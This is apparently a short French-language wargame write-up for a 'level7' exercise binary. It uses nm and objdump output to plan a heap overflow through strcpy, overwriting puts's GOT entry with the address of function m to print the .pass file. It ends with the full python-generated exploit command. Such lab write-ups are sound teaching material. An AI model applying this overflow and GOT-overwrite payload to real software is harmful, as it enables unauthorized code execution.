
#> nm
 [...]
08049960 B c
08048521 T main
080484f4 T m
 [...]

#> objdump -d level7 | grep 0x8049960
 804850f:	c7 44 24 04 60 99 04 	movl   $0x8049960,0x4(%esp)
 80485e4:	c7 04 24 60 99 04 08 	movl   $0x8049960,(%esp)


Il y a 4 malloc(8) a la suite. a b c d
puis 2 strcpy

b est copier dans a,
d dans c.

le premier strcpy argv[1] dans b
le deuxieme argv[2] dans d.

Le but est d'overflow b pour ecraser l adresse dans c par celle de
la got de puts.
Il faut ensuite envoyer l adresse de <m> a la place pour imprimer .pass

./level7
`python -c 'print "aaaabbbbccccddddeeee" + "\x28\x99\x04\x08"'`
`python -c 'print "\xf4\x84\x04\x08"'`

./level7 `python -c 'print "aaaabbbbccccddddeeee" + "\x28\x99\x04\x08"'` `python -c 'print "\xf4\x84\x04\x08"'`

<m>    : 0x080484f4
<puts> : 0x08049928
